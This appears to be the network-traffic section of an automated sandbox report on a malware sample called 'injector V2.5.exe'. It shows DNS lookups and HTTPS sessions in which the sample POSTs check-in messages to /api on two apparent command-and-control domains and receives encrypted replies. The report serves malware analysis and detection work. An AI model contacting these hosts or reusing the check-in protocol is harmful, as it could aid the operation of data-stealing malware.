                                                                        Nov 23, 2024 14:17:31.502232075 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:31.502263069 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:31.502410889 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:32.104173899 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:32.104409933 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:32.104475975 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:32.116283894 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:32.116313934 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:32.116355896 CET49730443192.168.2.4104.21.43.198
                                                                        Nov 23, 2024 14:17:32.116363049 CET44349730104.21.43.198192.168.2.4
                                                                        Nov 23, 2024 14:17:32.460639954 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:32.460714102 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:32.460822105 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:32.461282015 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:32.461317062 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:33.785625935 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:33.785866976 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:33.790201902 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:33.790224075 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:33.790683985 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:33.806097984 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:33.806258917 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:33.806307077 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:34.517749071 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:34.517992020 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:34.518060923 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:34.518129110 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:34.518161058 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:34.518202066 CET49731443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:34.518215895 CET44349731104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:34.575256109 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:34.575366974 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:34.575437069 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:34.575752020 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:34.575773001 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:35.837169886 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:35.837311029 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:35.839109898 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:35.839117050 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:35.839441061 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:35.840672970 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:35.840698004 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:35.840753078 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.543700933 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.543924093 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.543994904 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.544044971 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.544167995 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.544224977 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.544238091 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.551634073 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.551681995 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.551695108 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.560194016 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.560266972 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.560281038 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.602701902 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.602725983 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.649530888 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.663103104 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.712060928 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.712121964 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.744568110 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.744640112 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.744656086 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.744728088 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.744781017 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.744858027 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.744870901 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.744884014 CET49732443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.744889975 CET44349732104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.836975098 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.837063074 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:36.837161064 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.837558985 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:36.837599993 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.054970026 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.055093050 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:38.056644917 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:38.056668997 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.057470083 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.058696032 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:38.058844090 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:38.058902979 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.058990002 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:38.059003115 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.921720982 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.921833038 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:38.921910048 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:39.044950008 CET49733443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:39.045002937 CET44349733104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:39.267842054 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:39.267951965 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:39.268044949 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:39.268485069 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:39.268507957 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:40.586823940 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:40.586973906 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:40.588807106 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:40.588828087 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:40.589612961 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:40.590830088 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:40.590955973 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:40.590993881 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:41.435725927 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:41.435997009 CET44349734104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:41.436048031 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:41.436116934 CET49734443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:42.226366997 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:42.226459980 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:42.226555109 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:42.227000952 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:42.227039099 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:43.447890997 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:43.448049068 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:43.449589014 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:43.449615955 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:43.450517893 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:43.451761961 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:43.451960087 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:43.452006102 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:43.452081919 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:43.452100992 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:44.199078083 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:44.199353933 CET44349735104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:44.199426889 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:44.199485064 CET49735443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:44.686213017 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:44.686249018 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:44.686331987 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:44.687153101 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:44.687165022 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:45.914608002 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:45.914670944 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:45.916116953 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:45.916126966 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:45.916357040 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:45.917854071 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:45.917941093 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:45.917947054 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:46.604207039 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:46.604450941 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:46.604460001 CET44349736104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:46.604521036 CET49736443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:46.756831884 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:46.756869078 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:46.756952047 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:46.757302046 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:46.757317066 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:48.020884037 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:48.020961046 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:48.022407055 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:48.022424936 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:48.022743940 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:48.037467003 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:48.037558079 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:48.037564993 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:49.421860933 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:49.422173023 CET44349738104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:49.422195911 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:49.422259092 CET49738443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:49.528989077 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:49.529032946 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:49.529097080 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:49.529557943 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:49.529568911 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:50.790005922 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:50.790072918 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:50.791356087 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:50.791367054 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:50.791692972 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:50.800978899 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:50.801042080 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:50.801136017 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:51.492975950 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:51.493282080 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:51.493365049 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:51.511229038 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:51.511264086 CET44349742104.21.88.250192.168.2.4
                                                                        Nov 23, 2024 14:17:51.511305094 CET49742443192.168.2.4104.21.88.250
                                                                        Nov 23, 2024 14:17:51.511320114 CET44349742104.21.88.250192.168.2.4
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 14:17:29.663824081 CET6170653192.168.2.41.1.1.1
                                                                        Nov 23, 2024 14:17:30.042036057 CET53617061.1.1.1192.168.2.4
                                                                        Nov 23, 2024 14:17:32.121208906 CET6386253192.168.2.41.1.1.1
                                                                        Nov 23, 2024 14:17:32.458523035 CET53638621.1.1.1192.168.2.4
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 14:17:29.663824081 CET192.168.2.41.1.1.10xf0edStandard query (0)revirepart.bizA (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 14:17:32.121208906 CET192.168.2.41.1.1.10xcbf1Standard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 14:17:30.042036057 CET1.1.1.1192.168.2.40xf0edNo error (0)revirepart.biz104.21.43.198A (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 14:17:30.042036057 CET1.1.1.1192.168.2.40xf0edNo error (0)revirepart.biz172.67.184.174A (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 14:17:32.458523035 CET1.1.1.1192.168.2.40xcbf1No error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 14:17:32.458523035 CET1.1.1.1192.168.2.40xcbf1No error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false
                                                                        • revirepart.biz
                                                                        • frogs-severz.sbs
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449730104.21.43.1984436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:31 UTC261OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: revirepart.biz
                                                                        2024-11-23 13:17:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-11-23 13:17:32 UTC1011INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=feqlvq5s52tdbfvmv118lqsprp; expires=Wed, 19 Mar 2025 07:04:10 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3WWSi%2Bo4FN7tx6i4vt4H6BEJf0hW7XAb0RtIT8DHrMHYmtr4CrgdqrYCwzeytPO1MBQNjFqXwMTtmCfhRtH%2FcIJweuJhjpwDGYWFMqhAwLRmmoj0t%2BSnZbYMKayMYgTwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170a12fbf429d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2020&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1412675&cwnd=245&unsent_bytes=0&cid=2791e09a14adc664&ts=701&x=0"
                                                                        2024-11-23 13:17:32 UTC9INData Raw: 34 0d 0a 66 61 69 6c 0d 0a
                                                                        Data Ascii: 4fail
                                                                        2024-11-23 13:17:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449731104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:33 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-11-23 13:17:34 UTC1011INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=vuejsi4g5908akqbd8pt6vc909; expires=Wed, 19-Mar-2025 07:04:13 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTI0sfSoTsv6AHqI6UyW%2BMAXbhWdD%2FQGUaFejjPt7VyJCAL6rtuIgmf7XFxvH60NQCnKJC9rTtm%2FQoLN72CqwujIof8Ym%2BQeErE05i9rnzvL3p%2Fny2i5nxACInqjv8hxxvkW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170afeaf74390-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1578378&cwnd=243&unsent_bytes=0&cid=d2b39e449df2b7ea&ts=739&x=0"
                                                                        2024-11-23 13:17:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-11-23 13:17:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449732104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:35 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 86
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:35 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b701621bcd05&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                        2024-11-23 13:17:36 UTC1010INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=v6tsc358lacbr8tuu581srvroi; expires=Wed, 19-Mar-2025 07:04:15 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIZop66xzSTWo8212Elceq2WPQ9ZcF3me9W%2FZyse7h4MncXSknlutUZ7DzXRjrRns%2BbkLp29YOb2PRhv%2BLTnfkv41lON3vWhBCEHeLfASA2i6dVe4b%2BpWO1J6i%2Fg2Ug4zgX0"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170bcba88efa3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1966&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=986&delivery_rate=1465863&cwnd=32&unsent_bytes=0&cid=331e11a2ecaede37&ts=714&x=0"
                                                                        2024-11-23 13:17:36 UTC359INData Raw: 34 64 62 0d 0a 79 72 6a 72 78 33 62 46 57 55 71 70 2b 42 52 77 6c 70 6b 70 2b 37 4e 4a 58 63 62 5a 36 6a 65 59 38 79 78 79 76 52 4a 54 5a 74 69 78 6d 70 33 6c 54 50 46 31 61 4e 71 64 4e 6b 72 77 2b 45 57 49 31 6d 56 2f 70 37 33 49 44 66 36 53 51 41 48 59 50 6e 45 51 74 65 69 43 6a 61 59 61 74 6a 78 6d 69 35 31 73 55 71 7a 43 55 74 6e 57 4a 33 2f 38 2b 34 39 64 2b 70 4a 41 45 4e 78 35 50 42 61 30 71 64 43 48 6f 42 36 67 4f 69 37 49 6c 48 6b 56 38 2f 78 49 6b 64 30 67 4d 4b 36 30 79 42 75 36 6c 6c 5a 51 68 7a 41 65 41 36 79 72 39 59 71 30 48 65 63 6b 5a 74 4c 61 63 52 36 30 6f 77 75 61 31 69 73 78 6f 4c 32 42 58 2f 43 62 53 42 48 5a 65 43 4d 50 76 71 4c 51 69 61 4d 66 71 6a 4d 36 78 5a 35 2b 48 76 58 32 53 4e 6d 66 61 7a 69 38 2b 39 41 56 71 61 4e 4e 41 63
                                                                        Data Ascii: 4dbyrjrx3bFWUqp+BRwlpkp+7NJXcbZ6jeY8yxyvRJTZtixmp3lTPF1aNqdNkrw+EWI1mV/p73IDf6SQAHYPnEQteiCjaYatjxmi51sUqzCUtnWJ3/8+49d+pJAENx5PBa0qdCHoB6gOi7IlHkV8/xIkd0gMK60yBu6llZQhzAeA6yr9Yq0HeckZtLacR60owua1isxoL2BX/CbSBHZeCMPvqLQiaMfqjM6xZ5+HvX2SNmfazi8+9AVqaNNAc
                                                                        2024-11-23 13:17:36 UTC891INData Raw: 4a 39 47 66 48 70 51 4a 44 63 4a 6a 2b 70 73 59 64 57 2b 70 5a 45 47 74 42 36 4e 51 6d 33 72 74 71 4a 35 56 72 6e 50 44 43 4c 77 6a 59 78 38 65 74 4d 6c 63 64 70 42 65 53 6b 78 6b 79 36 6c 6b 4a 51 68 7a 41 35 41 62 6d 72 30 59 61 6d 48 4b 77 70 4b 4e 6d 63 65 78 66 6d 2f 55 36 58 32 79 67 74 72 72 57 4f 56 76 4f 61 52 78 58 59 64 48 46 4b 2b 71 2f 43 79 66 31 55 68 6a 59 6a 78 35 42 68 45 72 54 6b 42 59 43 52 4c 44 50 6b 34 38 68 52 2b 35 56 50 46 4e 46 2b 4e 51 69 38 70 74 65 47 6f 78 36 6e 50 43 4c 44 6b 6e 63 66 2f 2f 52 4c 6e 4e 77 76 4f 61 69 36 6a 52 57 30 30 55 6b 49 6e 79 68 78 4b 72 32 72 79 4d 75 51 46 36 6b 31 4c 39 33 61 61 56 7a 74 75 30 79 56 6b 58 4e 2f 71 72 36 48 52 2f 75 44 53 78 37 4e 66 44 51 43 74 36 76 55 69 61 41 54 71 6a 55 75 7a
                                                                        Data Ascii: J9GfHpQJDcJj+psYdW+pZEGtB6NQm3rtqJ5VrnPDCLwjYx8etMlcdpBeSkxky6lkJQhzA5Abmr0YamHKwpKNmcexfm/U6X2ygtrrWOVvOaRxXYdHFK+q/Cyf1UhjYjx5BhErTkBYCRLDPk48hR+5VPFNF+NQi8pteGox6nPCLDkncf//RLnNwvOai6jRW00UkInyhxKr2ryMuQF6k1L93aaVztu0yVkXN/qr6HR/uDSx7NfDQCt6vUiaATqjUuz
